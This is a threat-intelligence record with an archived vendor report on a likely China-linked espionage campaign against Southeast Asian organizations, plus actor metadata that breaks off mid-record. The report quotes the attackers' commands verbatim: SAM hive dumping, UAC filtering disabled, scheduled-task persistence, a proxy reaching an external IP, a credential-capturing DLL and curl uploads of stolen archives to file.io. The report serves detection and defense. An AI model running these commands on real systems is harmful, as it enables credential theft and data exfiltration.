{ "id": "6fd0fea3-eb31-4626-8a53-68775663e798", "created_at": "2026-04-06T00:13:44.517385Z", "updated_at": "2026-04-10T13:12:29.448143Z", "deleted_at": null, "sha1_hash": "9139a34107ab4cc3e506b55f7d2f2557f68b7e3e", "title": "Likely China-based Attackers Target High-profile Organizations in Southeast Asia", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 95719, "plain_text": "Likely China-based Attackers Target High-profile Organizations in\r\nSoutheast Asia\r\nBy About the Author\r\nArchived: 2026-04-05 13:01:47 UTC\r\nThreat actors using tools linked to China-based APT groups have targeted multiple high-profile organizations in\r\nSoutheast Asia, including government ministries in two different countries, an air traffic control organization, a\r\ntelecoms company, and a media outlet.\r\nThe attacks, which have been underway since at least October 2023, appear to have intelligence gathering as their\r\nmain goal. The attackers use a variety of both open-source and living-off-the-land tools in their operations. \r\nWhile attribution to a specific threat group cannot be determined, multiple tools used in the campaign have links\r\nto several China-based actors (see Tools section for details). Of note is the use of a proxy tool called Rakshasa and\r\na legitimate application file used for DLL sideloading, both of which were used previously by the Chinese\r\nadvanced persistent threat (APT) group known as Earth Baku (aka APT41, Brass Typhoon).\r\nA typical attack involves the use of a remote access tool that leverages Impacket to execute commands via\r\nWMI (Windows Management Instrumentation). The attackers then install keyloggers, password collectors, and\r\nreverse proxy tools (Rakshasa, Stowaway, ReverseSSH) to maintain connections to attacker-controlled\r\ninfrastructure. The threat actors also install customized DLL files that act as authentication mechanism filters,\r\nallowing them to intercept login credentials.\r\nTools\r\nThe threat actors used the following tools. However, the list of tools used in each attack varied and not all of the\r\nfollowing were used in every attack. \r\nDismap: An open-source asset discovery and identification tool. \r\nFastReverseProxy: FRP is an open-sourced tool used to expose local servers to the public internet.\r\nfile.io exfiltration: Commands used by the attackers suggests data gathered during a successful attack is\r\nexfiltrated to the legitimate file-sharing website file.io.\r\nImpacket: An open-source collection of modules written in Python for programmatically constructing and\r\nmanipulating network protocols. It contains several tools for remote service execution, Kerberos manipulation,\r\nWindows credential dumping, packet sniffing, and relay attacks.\r\nInfostealer: An information-collection tool that creates a hidden folder named AppCache and file named\r\nAppCache.dat in C:\\Users\\[CURRENT USER]\\AppData\\Local\\Microsoft\\Windows\\AppCache\\AppCache.dat. It\r\nthen encrypts and logs gathered information into AppCache.dat.\r\nhttps://www.security.com/threat-intelligence/china-southeast-asia-espionage\r\nPage 1 of 9\n\nInveigh: A cross-platform .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers. The tool can be\r\nused to conduct spoofing attacks and hash/credential captures through both packet sniffing and protocol specific\r\nlisteners/sockets.\r\nKeylogger: The attackers install customized DLL files that act as authentication mechanism filters, effectively\r\nallowing them to intercept login credentials from users who physically log in to the machine.\r\nLegitimate applications abused for DLL sideloading: The attackers used a legitimate application file\r\n(Bitdefender Crash Handler) from 2011 for DLL sideloading. This file was used previously in multiple attacks,\r\nsome of which were linked to the Chinese APT group known as Earth Baku (aka APT41, Brass Typhoon).\r\nLiving off the land: The attackers also made use of several living-off-the-land tools, including:\r\nPowerShell: Microsoft scripting tool that can be used to run commands, download payloads, traverse\r\ncompromised networks, and carry out reconnaissance.\r\nReg.exe: Windows command-line tool that can be used to edit the registry of local or remote computers.\r\nWMI (Windows Management Instrumentation): Microsoft command-line tool that can be used to\r\nexecute commands on remote computers.\r\nNBTScan: An open-source command-line NetBIOS scanner.\r\nPlugX (Korplug): A remote access Trojan (RAT) that can download additional plugins to enhance its capability\r\nbeyond information gathering. The malware was initially associated solely with multiple Chinese state-backed\r\nthreat actors, including Budworm (aka APT27, Emissary Panda, Lucky Mouse) and Fireant (aka Mustang Panda,\r\nAPT31, Stately Taurus). However, a range of other threat actors outside of China have used the malware since its\r\nsource code was allegedly leaked in 2015.\r\nRakshasa: A proxy tool written in Go, designed specifically for multi-level proxying and internal network\r\npenetration. The tool has been used previously by Earth Baku. In addition, the language used in the tool is\r\nsimplified Chinese. \r\nReverseSSH: A statically linked SSH server with reverse shell functionality.\r\nSharpGPOAbuse: A .NET application written in C# that can be used to take advantage of a user's edit rights on a\r\nGroup Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.\r\nSharpNBTScan: A NetBIOS scanning tool written in C#. The tool was used previously by the China-linked APT\r\ngroup known as Fireant (aka Mustang Panda, APT31, Stately Taurus).\r\nStowaway Proxy Tool: A publicly available multi-hop proxy tool that allows users to easily proxy their network\r\ntraffic to intranet nodes.\r\nTightVNC: Open-source remote desktop software.\r\nWinRAR: An archive manager that can be used to archive or zip files – for example, prior to exfiltration.\r\nAttack timeline\r\nhttps://www.security.com/threat-intelligence/china-southeast-asia-espionage\r\nPage 2 of 9\n\nThe following activity occurred on one of the targeted organizations’ networks. In this instance, the attackers\r\nremained active for at least three months, between June and August 2024, focusing on intelligence gathering—\r\nspecifically collecting and likely exfiltrating data of interest. While this case highlights a particular approach, in\r\nother attacks, the threat actors employed additional tactics, techniques, and procedures (TTPs), such as DLL\r\nsideloading, and leveraged tools like Rakshasa and SharpGPOAbuse, among others, to achieve their objectives.\r\nMachine 1\r\nThe first indication of malicious activity within this organization was on May 27 at 14:15 local time, where a\r\nsuspicious PowerShell command was executed. The command was used to modify the registry, specifically the\r\nsystem policies, to enable 'LocalAccountTokenFilterPolicy'. This value is responsible for controlling how local\r\naccounts are filtered when they are used to access a Windows system remotely. By setting the key to value '1', it\r\neffectively disables Remote UAC filtering for local accounts, allowing local admin accounts to use elevated\r\ntokens (with full admin rights when connecting remotely). \r\nAt 14:18, another suspicious command was executed via the WMI service:\r\ncmd.exe /Q /c cd \\ 1\u003e \\\\127.0.0.1\\ADMIN$\\__1716819456.018484 2\u003e\u00261\r\nThis pipe naming convention typically indicates a remote tool leveraging Impacket is being used to execute the\r\ncommands (also corroborated via process lineage). This is a common command observed as part of tooling used in\r\nlateral movement such as wmiexec. \r\nAt 14:22, several additional discovery commands were executed:\r\nnetsh wlan show profiles\r\nnet share\r\nnetstat -abnop tcp\r\nThese commands were used to display wireless network profile information, including network names for any\r\nwireless network that was connected to in the past.\r\nThe net share command lists any available network shares.\r\nThe netstat command lists all active (established and listening) TCP connections on the machine.\r\nThe next day on May 28 at 12:51, another suspicious command was executed via WMI:\r\ncmd.exe /Q /c move ChromeUpdate.dat ChromeUpdate.exe 1\u003e \\\\127.0.0.1\\ADMIN$\\__1716900555.2954416 2\u003e\u00261\r\nThe command was used to rename a likely uploaded file called ChromeUpdate.dat (SHA-256:\r\n8b6d081be732743aa6f6bccfb68b3f21878aa36723c1311f50406d752aacc9fa) to ChromeUpdate.exe. \r\nNext, the file was executed, passing ‘install' as a command-line argument:\r\nChromeUpdate.exe /install\r\nThe file contained an encrypted embedded keylogger payload for 64-bit systems.\r\nhttps://www.security.com/threat-intelligence/china-southeast-asia-espionage\r\nPage 3 of 9\n\nAt 13:07, several suspicious registry edits and scheduled task-related commands were executed:\r\nreg add hklm\\software\\microsoft\\windows\\CurrentVersion\\run /v mscorsvc /t REG_EXPAND_SZ /d\r\n\"\\\"CSIDL_PROGRAM_FILESX86\\microsoft.net\\redistlist\\mscorsvw.exe\"\" /f\r\nschtasks /create /sc once /st 23:59 /ru \"[REMOVED]\" /tn autorun /tr\r\n\"CSIDL_PROGRAM_FILESX86\\microsoft.net\\redistlist\\mscorsvw.exe\" /F\r\nschtasks /run /tn autorun\r\nThese commands were used to create a run key for a file called mscorsvw.exe in the registry using the run key\r\nname 'mscorsvc' – this will launch the file every time the system boots.\r\nThe schtasks command creates a scheduled task called 'autorun' under the user '[REMOVED]' and is configured to\r\nrun only once at 23:59 on the same day. \r\nDirectly after this, schtasks was executed to launch the autorun (i.e. mscorsvw.exe) task. \r\nAt 13:13, another scheduled task was created for a different file:\r\nschtasks /create /sc once /st 23:59 /ru \"[REMOVED]\" /tn autorun /tr\r\n\"CSIDL_SYSTEMX86\\wbem\\wintulxs.exe -c 38.60.146.78:443 -s 1qaz2wsx4rfv -reconnect 10\" /F\r\nThis task was scheduled to run once at 23:59 on the same day using the task name 'autorun' to execute a file called\r\n'wintulxs.exe' (SHA-256: d312b0e1968beae5a2ff3be2d8efc6d1bfdab3b1aec6faf8eafa295c47230194). This tool is\r\na freely available Chinese proxy tool called Stowaway, which is described as providing the ability to “proxy\r\nexternal traffic through multiple nodes to the core internal network, breaking through internal network access\r\nrestrictions.”\r\nOn May 30 at 03:16, the attackers returned and executed a series of ‘net’ commands to list network share sessions\r\nand available shares, and to view available shares on remote hosts. The attackers also mounted network shares.\r\nDirectly afterwards, the ‘fsutil’ command was executed to list all available file system drives (e.g. C:). \r\nnet session\r\nnet share\r\nnet view\r\nnet view \\\\192.168.21.65\r\nnet use [REMOVED]\\\\192.168.21.108/u:[REMOVED]\r\nnet use [REMOVED]/d/y\r\nnet use [REMOVED]\\\\192.168.21.61/u:[REMOVED]\r\nfsutil fsinfo drives\r\nhttps://www.security.com/threat-intelligence/china-southeast-asia-espionage\r\nPage 4 of 9\n\nMachine 2\r\nAt the time of the initial attacker activity on May 27 at 13:41, additional suspicious activity was also observed on\r\nanother machine. \r\nSimilar commands to those previously observed were executed as a means to bypass UAC. This time, the\r\ncommands were executed via TightVNC. \r\nnet user [REMOVED]\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v\r\nLocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f\r\nnet localgroup [REMOVED] [REMOVED] /add\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v\r\nLocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f\r\nAt 15:08, another suspicious reg.exe command was executed:\r\n\"CSIDL_SYSTEM\\reg.exe\" add \"hklm\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v [REMOVED] /t REG_DWORD /d 0 /f\r\nThis command was used to modify the Windows registry, specifically to hide a specific account from displaying in\r\nthe user list during user login.\r\nShortly after at 15:10, the attackers returned and dumped passwords from the registry:\r\ncmd.exe /Q /c cd 1\u003e \\\\127.0.0.1\\ADMIN$\\__1716822622.7074058 2\u003e\u00261\r\nreg save hklm\\sam sam.hive\r\nreg save hklm\\system system.hive\r\ncmd.exe /Q /c dir /on CSIDL_PROGRAM_FILES\\winrar\\rar.exe 1\u003e \\\\127.0.0.1\\ADMIN$\\__1716822622.7074058\r\n2\u003e\u00261\r\nThe attackers also checked that WinRAR was installed in the default path, likely using it to collect and later\r\nexfiltrate the hive files.\r\nOn May 28 at 13:51, the attackers used WMI to launch a command prompt.\r\nThe next day at 13:52, the attackers returned and copied an unknown file that masquerades as part of the .NET\r\nframework.\r\nCSIDL_WINDOWS\\microsoft.net\\framework\\v4.0.30319\\mscorsvw.exe →\r\nCSIDL_SYSTEM_DRIVE\\progra~2\\microsoft.net\\redistlist\\mscorsvw.exe.\r\nhttps://www.security.com/threat-intelligence/china-southeast-asia-espionage\r\nPage 5 of 9\n\nDirectly after this, the attackers proceeded to create registry run keys and scheduled a task to execute the sample at\r\n23:59:\r\nreg add hklm\\software\\microsoft\\windows\\CurrentVersion\\run /v mscorsvc /t REG_EXPAND_SZ /d\r\n\"\\\"CSIDL_PROGRAM_FILESX86\\microsoft.net\\redistlist\\mscorsvw.exe\"\" /f\r\nschtasks /create /sc once /st 23:59 /ru \"[REMOVED]\" /tn autorun /tr\r\n\"CSIDL_PROGRAM_FILESX86\\microsoft.net\\redistlist\\mscorsvw.exe\" /F\r\nschtasks /run /tn autorun\r\nFinally, the attackers used schtasks to launch the autorun service, executing mscorsvw.exe.\r\nMachine 3\r\nLater, on August 20, the attackers installed a ReverseSSH tool – winupdateser.exe (SHA-256:\r\n779b4a5f53d3128ab53dd8e13c362d6d077c3eb4987f878d7ef3416c801ef0dd).\r\nFollowing this, at 07:32, the attackers created a scheduled task on a remote system to execute an unknown\r\nWindows batch file (net.bat) at 15:35 using the task name 'Microsoft\\windows\\TaskScheduler\\Maintenance':\r\nschtasks /create /s [REMOVED] /u [REMOVED] /p [REMOVED] /tn\r\n\"Microsoft\\windows\\TaskScheduler\\Maintenance\" /tr \"CSIDL_SYSTEM\\net.bat\" /sc once /st 15:35\r\nShortly afterward, WMI was used to execute ‘ChromeUpdate.exe /install’ in order to install a keylogger. \r\nAt 08:11, WMI was used to execute ‘ipconfig /all \u003e\u003e %TEMP%\\cc.dat’ to collect network configuration\r\ninformation. \r\nOn September 4, the attackers returned and created multiple scheduled tasks to execute unknown Windows batch\r\nfiles using the task name 'Microsoft\\windows\\TaskScheduler\\Maintenance' on multiple machines:\r\nschtasks /create /s [REDACTED] /u [REMOVED] /p [REMOVED] /tn\r\n\"Microsoft\\windows\\TaskScheduler\\Maintenance\" /tr \"CSIDL_WINDOWS\\temp\\[REDACTED]udpate.bat\" /sc once\r\n/st 15:58\r\nMachine 4\r\nOn August 6 at 12:21, the attackers accessed another machine where they executed a script (ime.bat) in order to\r\ninstall a new authentication mechanism called Win32Pro. \r\necho off\r\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Kerberos /v Auth0 /t REG_SZ /d\"Win32Pro\"/f\r\n\u003e\u003ec:\\windows\\ime\\ime.log\r\nREG QUERY\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\"/v\"Notification\r\nPackages\"\u003e\u003ec:\\windows\\ime\\ime.log\r\nhttps://www.security.com/threat-intelligence/china-southeast-asia-espionage\r\nPage 6 of 9\n\nREG QUERY\r\n\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\"/v\"Security\r\nPackages\"\u003e\u003ec:\\windows\\ime\\ime.log\r\ndel %0\r\nFollowing the installation, the attackers launched a file named ‘win32pro.dll’ (SHA-256:\r\n89707a5bf9862a9effb1618a1a285a8d027fb343f6103f4bc68f736889f0a86e) via another file called rpc2.exe\r\n(SHA-256: e0f3b8028a2969e280efdd770978a54181fc242dd26cbf0a22e922f1e6a1b951).\r\nCSIDL_SYSTEM\\rpc2.exe CSIDL_SYSTEM\\win32pro.dll\r\nThe file ‘win32pro.dll’ was used to capture and collect user login information including the current time, domain\r\nname, username, machine name, and password. Captured credentials were stored in the following locations using\r\nthe RC4 encryption algorithm with the key \"rfvfsj\":\r\nc:\\windows\\system32\\normcache.nls\r\nC:\\Windows\\SYSVOL\\domain\\Policies\\{6AC1786C-016F-11D2-945F-00C04fB984F9}\\MACHINE\\Microsoft\\caches.db\r\nExfiltration activities\r\nDuring the course of these operations, the attackers conducted exfiltration activities within targeted organizations.\r\nThey maintained prolonged access to these networks, often spanning several months, while operating covertly to\r\navoid detection. \r\nDuring this time, they focused on harvesting credentials, including passwords, and mapping the network to\r\nidentify systems of interest. \r\nExfiltration was carried out through a combination of tactics, including the collection of files of interest using\r\nWinRAR, which were subsequently compressed into password-protected archives. These archives were then\r\nuploaded to cloud storage services such as File.io, enabling the attackers to stealthily exfiltrate sensitive data\r\nwhile minimizing the risk of exposure. This extended dwell time and calculated approach underscore the\r\nsophistication and persistence of the threat actors.\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_SYSTEM_DRIVE\\program files\\winrar\\rar.exe a -k -r -s -m5 -v100M\r\n\"CSIDL_PROFILE\\public\\downloads\\m1.rar\" c:\\users\\public\\downloads\\*.csv\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_SYSTEM_DRIVE\\program files\\winrar\\rar.exe a -k -r -s -m5 -v100M\r\n\"CSIDL_PROFILE\\public\\downloads\\m2.rar\" C:\\windows\\temp\\Netwrix-Report-20240312112337\\csv-files\\*.csv\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_SYSTEM_DRIVE\\program files\\winrar\\rar.exe a -k -r -s -m5 -v100M -\r\nhp@1232ws \"CSIDL_PROFILE\\public\\downloads\\m3.rar\" CSIDL_PROFILE\\public\\downloads\\[REMOVED]_sdulog.zip\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_SYSTEM_DRIVE\\program files\\winrar\\rar.exe a -k -r -s -m5 -v100M -\r\nhp@1232ws \"CSIDL_PROFILE\\public\\downloads\\m4.rar\" \\\\[REMOVED]\\logs$\\Users\\*.csv\r\nhttps://www.security.com/threat-intelligence/china-southeast-asia-espionage\r\nPage 7 of 9\n\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_SYSTEM_DRIVE\\program files\\winrar\\rar.exe a -k -r -s -m5 -v100M -\r\nhp@1232ws \"CSIDL_PROFILE\\public\\downloads\\m5.rar\" \\\\[REMOVED]\\logs$\\Computers\\*.csv\r\ncurl -k -F “file=@c:\\users\\public\\[REMOVED]_sdulog.zip”https://file.io\r\ncurl -k -F \"file=@c:\\users\\public\\downloads\\m3.rar\" https://file.io\r\nAttribution\r\nWhile the attackers in this campaign used a wide selection of TTPs that differed slightly between targeted\r\norganizations, the geographical location of targeted organizations, as well as the use of tools linked previously to\r\nChina-based APT groups, suggests that this activity is the work of China-based actors.\r\nTools leveraged in these attacks have been used by Chinese state-backed groups such as Fireant (aka Mustang\r\nPanda, APT31, Stately Taurus),  Earth Baku (aka APT41, Brass Typhoon), Budworm (aka APT27, Emissary\r\nPanda, Lucky Mouse), and others. However, due to many of these groups frequently sharing tools and using\r\nsimilar TTPs, specific attribution in this case is not possible. \r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.\r\nd312b0e1968beae5a2ff3be2d8efc6d1bfdab3b1aec6faf8eafa295c47230194 – Stowaway\r\ne0f3b8028a2969e280efdd770978a54181fc242dd26cbf0a22e922f1e6a1b951 – Loader\r\n33cb9f06338a9ea17107abbdc478071bbe097f80a835bbac462c4bb17cd0b798 – PlugX loader\r\n8b6d081be732743aa6f6bccfb68b3f21878aa36723c1311f50406d752aacc9fa – Keylogger\r\n89707a5bf9862a9effb1618a1a285a8d027fb343f6103f4bc68f736889f0a86e – Keylogger\r\n9fe3ff51443c41fe0be01a55a3a5fbfb261bcf63b3b0cd67f65a2c00a6d52ff3 – Keylogger\r\ne6cecba25abd092bfccba825298edecd2fdee6c428d9ae85399fabc54355e31f – Keylogger loader\r\n779b4a5f53d3128ab53dd8e13c362d6d077c3eb4987f878d7ef3416c801ef0dd - ReverseSSH\r\ne9572549b2f35f32861ffc9be160e9c8f86e4d9d3dd43c3727f0df4dc2acc944 – Infostealer\r\nb7472c6f6cba47ec85fa147c78f3a7a40a4fc5913fe41654ab499a7b1bd4ea2e – Batch file used to register custom\r\nDLL to hook into Windows authentication mechanisms\r\n3e4d86c4e1d463b99478f960c9c00f7d11cd0d1fb8dd2948e8340b7bc3550904 – Batch file used to register custom\r\nDLL to hook into Windows authentication mechanisms\r\nhttps://www.security.com/threat-intelligence/china-southeast-asia-espionage\r\nPage 8 of 9\n\nfb603072418da9150673ac9826a46a2b2462c8fc0afeacb2034ecb2b7d666001 – Batch file used to register custom\r\nDLL to hook into Windows authentication mechanisms\r\n340e872c814d221989ca2cb93819b9ad307572851b5b3f8bfcf791ff08e0e677 – Suspicious Windows script file\r\n80c3effc8f017b26c549bed8ba82097a6be7a59e383dd35adc917bf661e0a754 – Windows script file that drops\r\nSharpGPOAbuse and Rakshasa\r\n9b1794a1c8c59631d95178c7c4e2f5917b84864b342b4cfdab8f0990c3dbf5d2 – FastReverseProxy\r\nca0eeb4b71d4124dec785a9492970e9b1cfaa4cab0e8ca4486fc14b2e256d7f7 – Inveigh\r\nd7b85b92fb185272b89a7ff27424bff22a5a6542f6bde9838482aa9f87979828 – Dismap\r\nfa6de0d0bc9d83a3942aa8b3a12a5924dc662bec32cb3c2f212a0a0c0a4ebc7a – SharpNbtscan\r\n10029f14f2718362144b0e9b660994e8fb944af9ce9fcff04925f8b0615bb509 – SharpGPOAbuse\r\naa096f18e712ac0604e18d16441b672fcb393de9edf3ff4393519c48ab26a158 – Rakshasa\r\n386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd – Bitdefender Crash Handler (2011)\r\n38.60.146[.]78:443 – Stowaway\r\n118.107.219[.]66:443 – Stowaway \r\n45.123.188[.]180 – FastReverseProxy\r\n198.244.237[.]131 – Rakshasa download\r\nSource: https://www.security.com/threat-intelligence/china-southeast-asia-espionage\r\nhttps://www.security.com/threat-intelligence/china-southeast-asia-espionage\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://www.security.com/threat-intelligence/china-southeast-asia-espionage" ], "report_names": [ "china-southeast-asia-espionage" ], "threat_actors": [ { "id": "93542ae8-73cb-482b-90a3-445a20663f15", "created_at": "2022-10-25T16:07:24.058412Z", "updated_at": "2026-04-10T02:00:04.853499Z", "deleted_at": null, "main_name": "PKPLUG", "aliases": [ "Stately Taurus" ], "source_name": "ETDA:PKPLUG", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "49822165-5541-423d-8808-1c0a9448d588", "created_at": "2022-10-25T16:07:23.384093Z", "updated_at": "2026-04-10T02:00:04.575678Z", "deleted_at": null, "main_name": "Barium", "aliases": [ "Brass Typhoon", "Pigfish", "Starchy Taurus" ], "source_name": "ETDA:Barium", "tools": [ "Agent.dhwf", "Agentemis", "Barlaiy", "BleDoor", "Cobalt Strike", "CobaltStrike", "Destroy RAT", "DestroyRAT", "Kaba", "Korplug", "POISONPLUG", "PlugX", "RbDoor", "RedDelta", "RibDoor", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Winnti", "Xamtrav", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "aacd5cbc-604b-4b6e-9e58-ef96c5d1a784", "created_at": "2023-01-06T13:46:38.953463Z", "updated_at": "2026-04-10T02:00:03.159523Z", "deleted_at": null, "main_name": "APT31", "aliases": [ "JUDGMENT PANDA", "BRONZE VINEWOOD", "Red keres", "Violet Typhoon", "TA412" ], "source_name": "MISPGALAXY:APT31", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null }, { "id": "9e6186dd-9334-4aac-9957-98f022cd3871", "created_at": "2022-10-25T15:50:23.357398Z", "updated_at": "2026-04-10T02:00:05.368552Z", "deleted_at": null, "main_name": "ZIRCONIUM", "aliases": [ "APT31", "Violet Typhoon" ], "source_name": "MITRE:ZIRCONIUM", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c7d9878a-e691-4c6f-81ae-84fb115a1345", "created_at": "2022-10-25T16:07:23.359506Z", "updated_at": "2026-04-10T02:00:04.556639Z", "deleted_at": null, "main_name": "APT 41", "aliases": [ "BrazenBamboo", "Bronze Atlas", "Double Dragon", "Earth Baku", "G0096", "Grayfly", "Operation ColunmTK", "Operation CuckooBees", "Operation ShadowHammer", "Red Kelpie", "SparklingGoblin", "TA415", "TG-2633" ], "source_name": "ETDA:APT 41", "tools": [ "9002 RAT", "ADORE.XSEC", "ASPXSpy", "ASPXTool", "AceHash", "Agent.dhwf", "Agentemis", "AndroidControl", "AngryRebel", "AntSword", "BLUEBEAM", "Barlaiy", "BlackCoffee", "Bladabindi", "BleDoor", "CCleaner Backdoor", "CHINACHOPPER", "COLDJAVA", "China Chopper", "ChyNode", "Cobalt Strike", "CobaltStrike", "Crackshot", "CrossWalk", "CurveLast", "CurveLoad", "DAYJOB", "DBoxAgent", "DEADEYE", "DEADEYE.APPEND", "DEADEYE.EMBED", "DEPLOYLOG", "DIRTCLEANER", "DUSTTRAP", "Derusbi", "Destroy RAT", "DestroyRAT", "DodgeBox", "DragonEgg", "ELFSHELF", "EasyNight", "Farfli", "FunnySwitch", "Gh0st RAT", "Ghost RAT", "HDD Rootkit", "HDRoot", "HKDOOR", "HOMEUNIX", "HUI Loader", "HidraQ", "HighNoon", "HighNote", "Homux", "Hydraq", "Jorik", "Jumpall", "KEYPLUG", "Kaba", "Korplug", "LATELUNCH", "LOLBAS", "LOLBins", "LightSpy", "Living off the Land", "Lowkey", "McRAT", "MdmBot", "MessageTap", "Meterpreter", "Mimikatz", "MoonBounce", "MoonWalk", "Motnug", "Moudour", "Mydoor", "NTDSDump", "PACMAN", "PCRat", "PINEGROVE", "PNGRAT", "POISONPLUG", "POISONPLUG.SHADOW", "POTROAST", "PRIVATELOG", "PipeMon", "PlugX", "PortReuse", "ProxIP", "ROCKBOOT", "RbDoor", "RedDelta", "RedXOR", "RibDoor", "Roarur", "RouterGod", "SAGEHIRE", "SPARKLOG", "SQLULDR2", "STASHLOG", "SWEETCANDLE", "ScrambleCross", "Sensocode", "SerialVlogger", "ShadowHammer", "ShadowPad Winnti", "SinoChopper", "Skip-2.0", "SneakCross", "Sogu", "Speculoos", "Spyder", "StealthReacher", "StealthVector", "TERA", "TIDYELF", "TIGERPLUG", "TOMMYGUN", "TVT", "Thoper", "Voldemort", "WIDETONE", "WINNKIT", "WINTERLOVE", "Winnti", "WyrmSpy", "X-Door", "XDOOR", "XMRig", "XShellGhost", "Xamtrav", "ZXShell", "ZoxPNG", "certutil", "certutil.exe", "cobeacon", "gresim", "njRAT", "pwdump", "xDll" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "c63ab035-f9f2-4723-959b-97a7b98b5942", "created_at": "2023-01-06T13:46:38.298354Z", "updated_at": "2026-04-10T02:00:02.917311Z", "deleted_at": null, "main_name": "APT27", "aliases": [ "BRONZE UNION", "Circle Typhoon", "Linen Typhoon", "TEMP.Hippo", "Budworm", "Lucky Mouse", "G0027", "GreedyTaotie", "Red Phoenix", "Iron Tiger", "Iron Taurus", "Earth Smilodon", "TG-3390", "EMISSARY PANDA", "Group 35", "ZipToken" ], "source_name": 